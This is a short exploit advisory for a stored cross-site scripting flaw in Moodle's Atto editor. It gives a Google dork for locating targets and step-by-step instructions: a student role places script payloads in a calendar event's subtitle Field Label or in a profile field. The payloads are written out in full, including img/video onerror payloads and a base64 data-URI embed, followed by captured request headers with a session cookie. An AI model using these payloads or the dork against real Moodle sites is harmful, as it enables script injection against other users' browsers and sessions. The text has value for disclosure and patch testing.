Moodle Atto Editor Cross Site Scripting

The Moodle Atto Editor, which does not have versions, suffers from a cross site scripting vulnerability.

MD5 | f4de2e639f13916270235ef6f25e976f

# Exploit Title: Moodle Atto Editor Cross Site Scripting
# Date: 26.03.2021
# Author: Vincent666 ibn Winnie
# Software Link:
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or
# My Youtube Channel:


Video PoC: (Update)

Stored XSS in Atto Editor (default editor)

Use Demo:

Choose a role : Student (example)

Open calendar :

Create new event:


Event Title "Test"

Description :Choose Insert Video File and choose Video:

Video Source Url you can paste video link from youtube

And open Subtitles and Captions:

Subtitle track URL use video link from youtube

Field Label : There is we can use xss code:

<img src="1" onerror="alert(1)" />

or try in base64

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+"
type="image/svg+xml" AllowScriptAccess="always"></embed>

Insert Media and save this.

Open event and get stored xss.

Or we can use Profile:

Field Label in the Editor vulnerable to XSS.

We can use XSS and js redirect in the profile:

"><video src/onerror=alert(1)><img src=x'');>



User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Content-Type: application/json

X-Requested-With: XMLHttpRequest

Content-Length: 996


Connection: keep-alive


Cookie: MoodleSession=4ea0036558425526decc096ed375b886;


Related Posts